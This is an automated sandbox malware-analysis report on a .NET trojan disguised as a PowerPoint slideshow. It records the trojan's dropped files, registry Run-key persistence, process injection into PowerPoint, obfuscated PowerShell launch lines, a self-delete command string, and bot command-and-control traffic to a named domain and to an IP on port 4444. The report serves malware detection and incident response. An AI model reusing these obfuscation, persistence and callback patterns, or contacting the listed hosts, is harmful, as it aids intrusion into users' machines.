Energie-DIAPOxcod..exe
This report is generated from a file or URL submitted to this webservice on November 20th 2017 23:37:39 (UTC)
Guest System: Windows 7 32 bit, Home Premium, 6.1 (build 7601), Service Pack 1
Report generated by Falcon Sandbox v7.10 © Hybrid Analysis
Incident Response
Risk Assessment
- Remote Access
  - Uses network protocols on unusual ports
- Spyware
  - POSTs files to a webserver
- Stealer/Phishing
  - Scans for artifacts that may help identify the target
- Persistence
  - Modifies auto-execute functionality by setting/creating a value in the registry
  - Spawns a lot of processes
  - Writes data to a remote process
- Fingerprint
  - Reads the active computer name
  - Reads the cryptographic machine GUID
  - Reads the Windows installation date
  - Scans for artifacts that may help identify the target
- Evasive
  - Tries to sleep for a long time (more than two minutes)
- Spreading
  - Opens the MountPointManager (often used to detect additional infection locations)
- Network Behavior
  - Contacts 1 domain and 2 hosts
Indicators
Not all malicious and suspicious indicators are displayed.
Malicious Indicators (5)

External Systems

Detected Emerging Threats Alert
- details: Detected alert "ETPRO TROJAN MSIL/LiteHTTP Bot CnC Checkin" (SID: 2819705, Rev: 3, Severity: 1) categorized as "A Network Trojan was detected" (Backdoor, ransomware, trojans, etc.)
- source: Suricata Alerts
- relevance: 10/10
Installation/Persistence

Writes data to a remote process
- details:
  - "<Input Sample>" wrote 32 bytes to a remote process "%TEMP%\0XP.exe" (Handle: 804)
  - "<Input Sample>" wrote 52 bytes to a remote process "%TEMP%\0XP.exe" (Handle: 804)
  - "<Input Sample>" wrote 4 bytes to a remote process "%TEMP%\0XP.exe" (Handle: 804)
  - "<Input Sample>" wrote 4 bytes to a remote process "%PROGRAMFILES%\MICROS~3\Office14\POWERPNT.EXE" (Handle: 844)
  - "<Input Sample>" wrote 1500 bytes to a remote process "C:\PROGRA~1\MICROS~3\Office14\POWERPNT.EXE" (Handle: 844)
  - "<Input Sample>" wrote 32 bytes to a remote process "C:\PROGRA~1\MICROS~3\Office14\POWERPNT.EXE" (Handle: 844)
  - "<Input Sample>" wrote 52 bytes to a remote process "C:\PROGRA~1\MICROS~3\Office14\POWERPNT.EXE" (Handle: 844)
- source: API Call
- relevance: 6/10
Network Related

Uses network protocols on unusual ports
- details: TCP traffic to 91.160.159.49 on port 4444
- source: Network Traffic
- relevance: 7/10
Spyware/Information Retrieval

Scans for artifacts that may help identify the target
- details: "POWERPNT.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\MESSENGERSERVICE")
- source: Registry Access
- relevance: 3/10
Unusual Characteristics

Spawns a lot of processes
- details:
  - Spawned process "<Input Sample>"
  - Spawned process "0XP.exe"
  - Spawned process "cmd.exe" with commandline ""cmd /c ""%TEMP%\local.bat" ""
  - Spawned process "mode.com" with commandline "mode con:cols=20 lines=1"
  - Spawned process "powershell.exe" with commandline ""powershell -w 1 -C "sv IY -;sv FI ec;sv CSH ((gv IY).value.toString()+(gv FI).value.toString());powershell (gv CSH).value.toString() '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'""
  - Spawned process "POWERPNT.EXE" with commandline ""%TEMP%\energies.ppt""
  - Spawned process "powershell.exe" with commandline "-ec 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"
  - Spawned process "powershell.exe" with commandline "-ec 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"
  - Spawned process "csc.exe" with commandline "/noconfig /fullpaths @"%TEMP%\6ljpalv5.cmdline""
  - Spawned process "cvtres.exe" with commandline "/NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESA6DE.tmp" "%TEMP%\CSCA6C9.tmp""
- source: Monitored Target
- relevance: 8/10
Suspicious Indicators (20)

Environment Awareness

Reads the cryptographic machine GUID
- details:
  - "<Input Sample>" (Path: "HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY"; Key: "MACHINEGUID")
  - "0XP.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY"; Key: "MACHINEGUID")
  - "powershell.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY"; Key: "MACHINEGUID")
  - "POWERPNT.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY"; Key: "MACHINEGUID")
- source: Registry Access
- relevance: 10/10
Reads the Windows installation date
- details: "powershell.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION"; Key: "INSTALLDATE")
- source: Registry Access
- relevance: 10/10
General

Opened the service control manager
- details:
  - "0XP.exe" called "OpenSCManager" requesting access rights "0X0"
  - "0XP.exe" called "OpenSCManager" requesting access rights "SC_MANAGER_CONNECT" (0x1)
- source: API Call
- relevance: 10/10
POSTs files to a webserver
- details: the following request was sent with no payload
    POST /sharp/r3set/page.php HTTP/1.1
    User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
    Content-Type: application/x-www-form-urlencoded
    Host: sevenxi.xyz
    Content-Length: 427
    Expect: 100-continue
    Connection: Keep-Alive
- source: Network Traffic
- relevance: 5/10
Requested access to a system service
- details:
  - "0XP.exe" called "OpenService" to access the "RASMAN" service requesting "SERVICE_QUERY_STATUS" (0X4) access rights
  - "0XP.exe" called "OpenService" to access the "rasman" service
  - "0XP.exe" called "OpenService" to access the "RASMAN" service
- source: API Call
- relevance: 10/10
Installation/Persistence

Drops executable files
- details:
  - "6ljpalv5.dll" has type "PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly for MS Windows"
  - "0XP.exe" has type "PE32 executable (GUI) Intel 80386 Mono/.Net assembly for MS Windows"
  - "RESA6DE.tmp" has type "80386 COFF executable not stripped - version 25189"
- source: Binary File
- relevance: 10/10
Modifies auto-execute functionality by setting/creating a value in the registry
- details: "0XP.exe" (Access type: "SETVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN"; Key: "0XP SCAN"; Value: ""%TEMP%\0XP.exe"")
- source: Registry Access
- relevance: 8/10
Network Related

Detected increased number of ARP broadcast requests (network device lookup)
- details: Attempt to find devices in networks: "192.168.56.13/32, 192.168.56.15/32, 192.168.56.16/32, 192.168.56.21/32, 192.168.56.22/31, 192.168.56.24/31, ..."
- source: Network Traffic
- relevance: 10/10
Found potential IP address in binary/memory
- details: Heuristic match: "ping 1.1.1.1 -n 1 -w 4000 > Nul & Del ""
- source: File/Memory
- relevance: 3/10
System Security

Hooks API calls
- details:
  - "SysAllocStringByteLen@OLEAUT32.DLL" in "POWERPNT.EXE"
  - "VariantChangeType@OLEAUT32.DLL" in "POWERPNT.EXE"
  - "SysFreeString@OLEAUT32.DLL" in "POWERPNT.EXE"
  - "VariantClear@OLEAUT32.DLL" in "POWERPNT.EXE"
  - "OleLoadFromStream@OLE32.DLL" in "POWERPNT.EXE"
- source: Hook Detection
- relevance: 10/10
Modifies proxy settings
- details:
  - "<Input Sample>" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
  - "<Input Sample>" (Access type: "DELETEVAL"; Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
- source: Registry Access
- relevance: 10/10
Queries sensitive IE security settings
- details:
  - "<Input Sample>" (Path: "HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SECURITY"; Key: "DISABLESECURITYSETTINGSCHECK")
  - "POWERPNT.EXE" (Path: "HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SECURITY"; Key: "DISABLESECURITYSETTINGSCHECK")
- source: Registry Access
- relevance: 8/10
Unusual Characteristics

Installs hooks/patches the running process
- details:
  - "<Input Sample>" wrote bytes "db4dbf6f00000000" to virtual address "0x00032000" (part of module "7D12EA86D696F05082A7560972BF221FF6E588F5E36A9B96B1FEAAF706F7B51E.EXE")
  - "<Input Sample>" wrote bytes "ae48c208" to virtual address "0x6C121FDC" (part of module "MSCORWKS.DLL")
  - "powershell.exe" wrote bytes "40532b7758582c77186a2c77653c2d770000000000bf7e750000000056cc7e75000000007cca7e7500000000376845756a2c2d77d62d2d7700000000206945750000000029a67e7500000000a48d457500000000f70e7e7500000000" to virtual address "0x773C1000" (part of module "NSI.DLL")
  - "powershell.exe" wrote bytes "f75574ab" to virtual address "0x6C111FDC" (part of module "MSCORWKS.DLL")
  - "powershell.exe" wrote bytes "08574d76047856760000000051c11d7794981d77ee9c1d7775dc1f77273e1f77efb223770000000046ce7e75013d7f7538ed7f75cfcd7e7531237e75de2f7f75c4ca7e7580bb7e75aa6e7f759fbb7e7592bb7e7546ba7e750abf7e7500000000" to virtual address "0x6AA61000" (part of module "SHFOLDER.DLL")
  - "POWERPNT.EXE" wrote bytes "775be5ba" to virtual address "0x6404CA70" (part of module "GFX.DLL")
  - "POWERPNT.EXE" wrote bytes "d709ddba" to virtual address "0x659621E8" (part of module "PPCORE.DLL")
  - "POWERPNT.EXE" wrote bytes "e9603328ed" to virtual address "0x75AF4731" ("SysAllocStringByteLen@OLEAUT32.DLL")
  - "POWERPNT.EXE" wrote bytes "e99e4854ed" to virtual address "0x757F3D01" ("SetUnhandledExceptionFilter@KERNEL32.DLL")
  - "POWERPNT.EXE" wrote bytes "4f572d6e" to virtual address "0x5DC99904" (part of module "RICHED20.DLL")
  - "POWERPNT.EXE" wrote bytes "e923992aed" to virtual address "0x75AF5DEE" ("VariantChangeType@OLEAUT32.DLL")
  - "POWERPNT.EXE" wrote bytes "c4ca7e7580bb7e75aa6e7f759fbb7e7508bb7e7546ce7e7561387f75de2f7f75d0d97e75000000001779db754f91db757f6fdb75f4f7db7511f7db75f283db75857edb7500000000" to virtual address "0x68371000" (part of module "MSIMG32.DLL")
  - "POWERPNT.EXE" wrote bytes "b4badcba" to virtual address "0x2D1D15E4" (part of module "POWERPNT.EXE")
  - "POWERPNT.EXE" wrote bytes "e99a5427ed" to virtual address "0x75AF3E59" ("SysFreeString@OLEAUT32.DLL")
  - "POWERPNT.EXE" wrote bytes "e9365528ed" to virtual address "0x75AF3EAE" ("VariantClear@OLEAUT32.DLL")
  - "POWERPNT.EXE" wrote bytes "99e1c486" to virtual address "0x62F90BA8" (part of module "MSO.DLL")
  - "POWERPNT.EXE" wrote bytes "dad4ebba" to virtual address "0x644A78E4" (part of module "OART.DLL")
  - "POWERPNT.EXE" wrote bytes "e9c53202ed" to virtual address "0x762F6143" ("OleLoadFromStream@OLE32.DLL")
  - "powershell.exe" wrote bytes "92baf6b8" to virtual address "0x6C111FDC" (part of module "MSCORWKS.DLL")
- source: Hook Detection
- relevance: 10/10
Reads information about supported languages
- details:
  - "cmd.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000409")
  - "mode.com" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000409")
  - "powershell.exe" (Path: "HKCU\CONTROL PANEL\INTERNATIONAL"; Key: "SYEARMONTH")
  - "POWERPNT.EXE" (Path: "HKCU\CONTROL PANEL\INTERNATIONAL"; Key: "IMEASURE")
  - "POWERPNT.EXE" (Path: "HKCU\CONTROL PANEL\INTERNATIONAL"; Key: "SLIST")
  - "POWERPNT.EXE" (Path: "HKCU\CONTROL PANEL\INTERNATIONAL"; Key: "STHOUSAND")
  - "POWERPNT.EXE" (Path: "HKCU\CONTROL PANEL\INTERNATIONAL"; Key: "SDECIMAL")
  - "POWERPNT.EXE" (Path: "HKCU\CONTROL PANEL\INTERNATIONAL"; Key: "SDATE")
  - "POWERPNT.EXE" (Path: "HKCU\CONTROL PANEL\INTERNATIONAL"; Key: "STIME")
  - "POWERPNT.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000409")
  - "POWERPNT.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000401")
  - "POWERPNT.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "0000040D")
  - "POWERPNT.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "0000041E")
  - "POWERPNT.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "0000042A")
  - "POWERPNT.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000439")
  - "POWERPNT.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000420")
  - "POWERPNT.EXE" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000429")
  - "POWERPNT.EXE" (Path: "HKCU\CONTROL PANEL\INTERNATIONAL"; Key: "NUMSHAPE")
- source: Registry Access
- relevance: 3/10
Hiding 6 Suspicious Indicators (all indicators are available only in the private webservice or standalone version)
Informative (15)

Environment Awareness

Reads the registry for installed applications
- details:
  - "<Input Sample>" (Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\0XP.EXE")
  - "<Input Sample>" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\0XP.EXE")
  - "<Input Sample>" (Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\LOCAL.BAT")
  - "<Input Sample>" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\LOCAL.BAT")
  - "<Input Sample>" (Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\POWERPNT.EXE")
  - "<Input Sample>" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\POWERPNT.EXE")
  - "<Input Sample>" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\POWERPNT.EXE"; Key: "PATH"; Value: "00000000010000005800000043003A005C00500072006F006700720061006D002000460069006C00650073005C004D006900630072006F0073006F006600740020004F00660066006900630065005C004F0066006600690063006500310034005C000000")
  - "POWERPNT.EXE" (Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\POWERPNT.EXE")
  - "POWERPNT.EXE" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\POWERPNT.EXE")
- source: Registry Access
- relevance: 10/10
General

Contacts domains
- details: "sevenxi.xyz"
- source: Network Traffic
- relevance: 1/10
Contacts server
- details:
  - "91.160.159.49:4444"
  - "185.117.75.48:80"
- source: Network Traffic
- relevance: 1/10
Creates a writable file in a temporary directory
- details:
  - "<Input Sample>" created file "%TEMP%\0XP.exe"
  - "<Input Sample>" created file "%TEMP%\local.bat"
  - "<Input Sample>" created file "%TEMP%\energies.ppt"
  - "POWERPNT.EXE" created file "%TEMP%\energies.ppt"
  - "POWERPNT.EXE" created file "%TEMP%\~DFDF4B56F96AB138F2.TMP"
- source: API Call
- relevance: 1/10
Creates mutants
- details:
  - "\Sessions\1\BaseNamedObjects\Local\ZonesCounterMutex"
  - "\Sessions\1\BaseNamedObjects\Local\ZonesCacheCounterMutex"
  - "\Sessions\1\BaseNamedObjects\Local\ZoneAttributeCacheCounterMutex"
  - "\Sessions\1\BaseNamedObjects\Local\ZonesLockedCacheCounterMutex"
  - "Local\ZoneAttributeCacheCounterMutex"
  - "Local\ZonesLockedCacheCounterMutex"
  - "Local\ZonesCounterMutex"
  - "Local\ZonesCacheCounterMutex"
  - "\Sessions\1\BaseNamedObjects\RasPbFile"
  - "\Sessions\1\BaseNamedObjects\Global\.net clr networking"
  - "Global\.net clr networking"
  - "RasPbFile"
- source: Created Mutant
- relevance: 3/10
Loads rich edit control libraries
- details: "POWERPNT.EXE" loaded module "%COMMONPROGRAMFILES%\microsoft shared\OFFICE14\RICHED20.DLL" at 5DC50000
- source: Loaded Module
Loads the .NET runtime environment
- details:
  - "<Input Sample>" loaded module "%WINDIR%\assembly\NativeImages_v2.0.50727_32\mscorlib\d40b99d82652dbbc000d378a824ae296\mscorlib.ni.dll" at 6B580000
  - "0XP.exe" loaded module "%WINDIR%\assembly\NativeImages_v2.0.50727_32\mscorlib\d40b99d82652dbbc000d378a824ae296\mscorlib.ni.dll" at 6B570000
  - "powershell.exe" loaded module "%WINDIR%\assembly\NativeImages_v2.0.50727_32\mscorlib\d40b99d82652dbbc000d378a824ae296\mscorlib.ni.dll" at 6B570000
  - "csc.exe" loaded module "%WINDIR%\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll" at 02590000
- source: Loaded Module
Process launched with changed environment
- details:
  - Process "POWERPNT.EXE" was launched with new environment variables: "MEOW="C:\Program Files\Microsoft Office\Office14\""
  - Process "powershell.exe" was launched with modified environment variables: "PSModulePath"
  - Process "powershell.exe" was launched with missing environment variables: "MEOW"
  - Process "csc.exe" was launched with new environment variables: "localappdata="C:\Users\%USERNAME%\AppData\Local", mpconfig_reportingguid="D9765A22-4A32-46A9-92CB-043F61DC4FA2", _clrrestrictsecattributes="1", tmp="C:\Users\%USERNAME%\AppData\Local\Temp", path="%ALLUSERSPROFILE%\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Wireshark", username="65qHXIS", pathext=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", public="C:\Users\%USERNAME%\ProgramData\Microsoft\Windows Defender", processor_identifier="x86 Family 21 Model 1 Stepping 2 AuthenticAMD", computername="M9gaw3Gzo3", programdata="C:\ProgramData", programfiles="C:\Program Files", mpconfig_productuserappdatapath="C:\Users\%USERNAME%\AppData\Local\Microsoft\Windows Defender", processor_level="21", number_of_processors="1", homepath="\Users\65qHXIS", temp="C:\Users\%USERNAME%\AppData\Local\Temp", prompt="$P$G", userdomain="M9gaw3Gzo3", systemdrive="C:", psmodulepath="C:\Users\%USERNAME%\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\", userprofile="C:\Users\%USERNAME%\\PSPUBWS-PC", appdata="C:\Users\%USERNAME%\AppData\Roaming", fp_no_host_check="NO", processor_revision="0102", commonprogramfiles="C:\Program Files\Common Files", allusersprofile="C:\ProgramData", mpconfig_productcodename="AntiSpyware", comspec="C:\Windows\system32\cmd.exe", processor_architecture="x86", systemroot="C:\Windows", homedrive="C:", mpconfig_productpath="C:\Program Files\Windows Defender""
  - Process "csc.exe" was launched with missing environment variables: "MpConfig_ProductUserAppDataPath, PROCESSOR_ARCHITECTURE, PSModulePath, PROCESSOR_REVISION, PROCESSOR_LEVEL, PATHEXT, LOGONSERVER, USERDOMAIN, MpConfig_ProductAppDataPath, SystemRoot, ALLUSERSPROFILE, TMP, ProgramData, HOMEPATH, PUBLIC, PROMPT, LOCALAPPDATA, COMPUTERNAME, USERNAME, ComSpec, MpConfig_ProductPath, FP_NO_HOST_CHECK, USERPROFILE, TEMP, SystemDrive, PROCESSOR_IDENTIFIER, Path, APPDATA, MpConfig_ReportingGUID, OS, CommonProgramFiles, ProgramFiles, HOMEDRIVE, NUMBER_OF_PROCESSORS, MpConfig_ProductCodeName"
- source: Monitored Target
- relevance: 10/10
Runs shell commands
- details: ""cmd /c ""%TEMP%\local.bat" "" on 2017-11-20.14:39:57.777
- source: Monitored Target
- relevance: 5/10
Scanning for window names
- details:
  - "POWERPNT.EXE" searching for class "REListbox20W"
  - "POWERPNT.EXE" searching for class "MsoCommandBarPopup"
  - "POWERPNT.EXE" searching for class "OfficeTooltip"
- source: API Call
- relevance: 10/10
Spawns new processes
- details:
  - Spawned process "0XP.exe"
  - Spawned process "cmd.exe" with commandline ""cmd /c ""%TEMP%\local.bat" ""
  - Spawned process "mode.com" with commandline "mode con:cols=20 lines=1"
  - Spawned process "powershell.exe" with commandline ""powershell -w 1 -C "sv IY -;sv FI ec;sv CSH ((gv IY).value.toString()+(gv FI).value.toString());powershell (gv CSH).value.toString() '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'"" (UID: 00054944-00003596, Additional Context: "sv IY -sv FI ecsv CSH ((gv IY).value.toString()+(gv FI).value.toString()) (gv CSH).value.toString()'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';")
  - Spawned process "POWERPNT.EXE" with commandline ""%TEMP%\energies.ppt""
  - Spawned process "powershell.exe" with commandline "-ec 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"
  - Spawned process "powershell.exe" with commandline "-ec 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"
  - Spawned process "csc.exe" with commandline "/noconfig /fullpaths @"%TEMP%\6ljpalv5.cmdline""
  - Spawned process "cvtres.exe" with commandline "/NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESA6DE.tmp" "%TEMP%\CSCA6C9.tmp""
- source: Monitored Target
- relevance: 3/10
Installation/Persistence

Dropped files
- details:
  - "energies.LNK" has type "MS Windows shortcut Item id list present Points to a file or directory Has Relative path Archive ctime=Mon Nov 20 22:39:57 2017 mtime=Mon Nov 20 22:39:57 2017 atime=Mon Nov 20 22:39:57 2017 length=2051584 window=hide"
  - "6ljpalv5.dll" has type "PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly for MS Windows"
  - "0XP.exe" has type "PE32 executable (GUI) Intel 80386 Mono/.Net assembly for MS Windows"
  - "local.bat" has type "ASCII text with very long lines with CRLF line terminators"
  - "energies.ppt" has type "Composite Document File V2 Document Little Endian O%WINDIR%\Version 5.1 Code page: 1252 Title: Gabarit formation STI2D Author: GRANJON David Last Saved By: ENAULT Revision Number: 453 Name of Creating Application: Microsoft Office PowerPoint Total Editing Time: 3d+07:31:43 Last Printed: Wed Feb 15 10:56:10 2012 Create Time/Date: Tue Sep 14 06:05:30 2010 Last Saved Time/Date: Mon Mar 26 10:55:04 2012 Number of Words: 2411"
  - "565950BA.wmf" has type "ms-windows metafont .wmf"
  - "RESA6DE.tmp" has type "80386 COFF executable not stripped - version 25189"
  - "index.dat" has type "data"
  - "6ljpalv5.out" has type "UTF-8 Unicode (with BOM) text with very long lines with CRLF line terminators"
  - "DADD3573.wmf" has type "ms-windows metafont .wmf"
  - "6ljpalv5.pdb" has type "MSVC program database ver \002"
  - "K4R3057IRAU7L1AL6CBG.temp" has type "data"
  - "ZXDHRFEVKQIGKVFQV7CC.temp" has type "data"
  - "GB9R5TCIOUEB9XX9HLKX.temp" has type "data"
  - "CSCA6C9.tmp" has type "MSVC .res"
  - "6ljpalv5.0.cs" has type "UTF-8 Unicode (with BOM) text with very long lines"
  - "565AB65D.wmf" has type "ms-windows metafont .wmf"
  - "6ljpalv5.cmdline" has type "UTF-8 Unicode (with BOM) text with very long lines with no line terminators"
- source: Binary File
- relevance: 3/10
Touches files in the Windows directory
- details:
  - "<Input Sample>" touched file "%WINDIR%\Microsoft.NET\Framework\v1.0.3705\clr.dll"
  - "<Input Sample>" touched file "C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll"
  - "<Input Sample>" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll"
  - "<Input Sample>" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll"
  - "<Input Sample>" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll"
  - "<Input Sample>" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll"
  - "<Input Sample>" touched file "C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll"
  - "<Input Sample>" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config"
  - "<Input Sample>" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\security.config"
  - "<Input Sample>" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\security.config.cch"
  - "<Input Sample>" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\enterprisesec.config"
  - "<Input Sample>" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\enterprisesec.config.cch"
  - "<Input Sample>" touched file "C:\Windows\Globalization\Sorting\SortDefault.nls"
  - "<Input Sample>" touched file "C:\Windows\assembly\NativeImages_v2.0.50727_32\index248.dat"
  - "<Input Sample>" touched file "C:\Windows\System32\l_intl.nls"
  - "<Input Sample>" touched file "C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp"
  - "<Input Sample>" touched file "C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp"
  - "<Input Sample>" touched file "C:\Windows\assembly\pubpol47.dat"
- source: API Call
- relevance: 7/10
Network Related

Found potential URL in binary/memory
- details: Pattern match: "http://sevenxi.xyz/sharp/r3set/page.php"
- source: File/Memory
- relevance: 10/10
Unusual Characteristics

Matched Compiler/Packer signature
- details:
  - "7d12ea86d696f05082a7560972bf221ff6e588f5e36a9b96b1feaaf706f7b51e.exe.bin" was detected as "Microsoft visual C# v7.0 / Basic .NET"
  - "6ljpalv5.dll" was detected as "Microsoft visual C# v7.0 / Basic .NET"
  - "0XP.exe" was detected as "Microsoft visual C# v7.0 / Basic .NET"
- source: Static Parser
- relevance: 10/10
File Details
Energie-DIAPOxcod..exe
- Filename: Energie-DIAPOxcod..exe
- Size: 4MiB (4194304 bytes)
- Type: peexe assembly executable
- Description: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
- Architecture: WINDOWS
- SHA256: 7d12ea86d696f05082a7560972bf221ff6e588f5e36a9b96b1feaaf706f7b51e
- MD5: 31040ca5beb00de6174a92525623c865
- SHA1: d3c5fa78c27ac42b7f5034b0aff9b75ba5520696
- ssdeep: 49152:IoWJ7PRBCcJC4ZoeREKZadxv5GDLljdftUZH:YfeZH
- imphash: f34d5f2d4577ed6d9ceec516c1f5a744
- authentihash: 68f7f338780102d2ffde03171828fdb8f4bf92ba8b70a3107a43f7e04061ce5b
- Compiler/Packer: Microsoft visual C# v7.0 / Basic .NET
- PDB Pathway
Version Info
- Translation: 0x0000 0x04b0
- LegalCopyright: -
- Assembly Version: 0.0.0.0
- InternalName: Energie-DIAPO.exe
- FileVersion: 0.0.0.0
- ProductVersion: 0.0.0.0
- FileDescription: -
- OriginalFilename: Energie-DIAPO.exe
Classification (TrID)
- 49.0% (.EXE) Generic CIL Executable (.NET, Mono, etc.)
- 20.9% (.EXE) Win32 Executable MS Visual C++ (generic)
- 18.5% (.EXE) Win64 Executable (generic)
- 4.4% (.DLL) Win32 Dynamic Link Library (generic)
- 3.0% (.EXE) Win32 Executable (generic)
Hybrid Analysis
Analysed 10 processes in total (System Resource Monitor).
- Input Sample (PID: 3500)
- 0XP.exe (PID: 2288)
- cmd.exe "cmd /c ""%TEMP%\local.bat" " (PID: 2280)
- mode.com mode con:cols=20 lines=1 (PID: 3512)
- powershell.exe "powershell -w 1 -C "sv IY -;sv FI ec;sv CSH ((gv IY).value.toString()+(gv FI).value.toString());powershell (gv CSH).value.toString() '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'" (PID: 3596, Additional Context: sv IY -sv FI ecsv CSH ((gv IY).value.toString()+(gv FI).value.toString()) (gv CSH).value.toString()'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';)
- powershell.exe -ec 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 (PID: 3508)
- powershell.exe -ec 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 (PID: 2444)
- csc.exe /noconfig /fullpaths @"%TEMP%\6ljpalv5.cmdline" (PID: 2636)
- cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESA6DE.tmp" "%TEMP%\CSCA6C9.tmp" (PID: 3780)
- POWERPNT.EXE "%TEMP%\energies.ppt" (PID: 3664)
Network Analysis
DNS Requests
Domain | Address | Registrar | Country |
---|---|---|---|
sevenxi.xyz | 185.117.75.48 | - | Netherlands |
Contacted Hosts
IP Address | Port/Protocol | Associated Process | Country |
---|---|---|---|
91.160.159.49 | 4444/TCP | powershell.exe (PID: 2444) | France |
185.117.75.48 | 80/TCP | 0xp.exe (PID: 2288) | Netherlands |
HTTP Traffic
Endpoint | Request | URL | Request headers / Response |
---|---|---|---|
185.117.75.48:80 (sevenxi.xyz) | POST | sevenxi.xyz/sharp/r3set/page.php | POST /sharp/r3set/page.php HTTP/1.1; User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3; Content-Type: application/x-www-form-urlencoded; Host: sevenxi.xyz; Content-Length: 427; Expect: 100-continue; Connection: Keep-Alive (response: 100 Continue) |
185.117.75.48:80 (sevenxi.xyz) | POST | sevenxi.xyz/sharp/r3set/page.php | POST /sharp/r3set/page.php HTTP/1.1; User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3; Content-Type: application/x-www-form-urlencoded; Host: sevenxi.xyz; Content-Length: 427; Expect: 100-continue; Connection: Keep-Alive (response: 100 Continue) |
185.117.75.48:80 (sevenxi.xyz) | POST | sevenxi.xyz/sharp/r3set/page.php | POST /sharp/r3set/page.php HTTP/1.1; User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3; Content-Type: application/x-www-form-urlencoded; Host: sevenxi.xyz; Content-Length: 427; Expect: 100-continue; Connection: Keep-Alive (response: 100 Continue) |
185.117.75.48:80 (sevenxi.xyz) | POST | sevenxi.xyz/sharp/r3set/page.php | POST /sharp/r3set/page.php HTTP/1.1; User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3; Content-Type: application/x-www-form-urlencoded; Host: sevenxi.xyz; Content-Length: 427; Expect: 100-continue; Connection: Keep-Alive (response: 100 Continue) |
185.117.75.48:80 (sevenxi.xyz) | POST | sevenxi.xyz/sharp/r3set/page.php | POST /sharp/r3set/page.php HTTP/1.1; User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3; Content-Type: application/x-www-form-urlencoded; Host: sevenxi.xyz; Content-Length: 427; Expect: 100-continue; Connection: Keep-Alive (response: 100 Continue) |
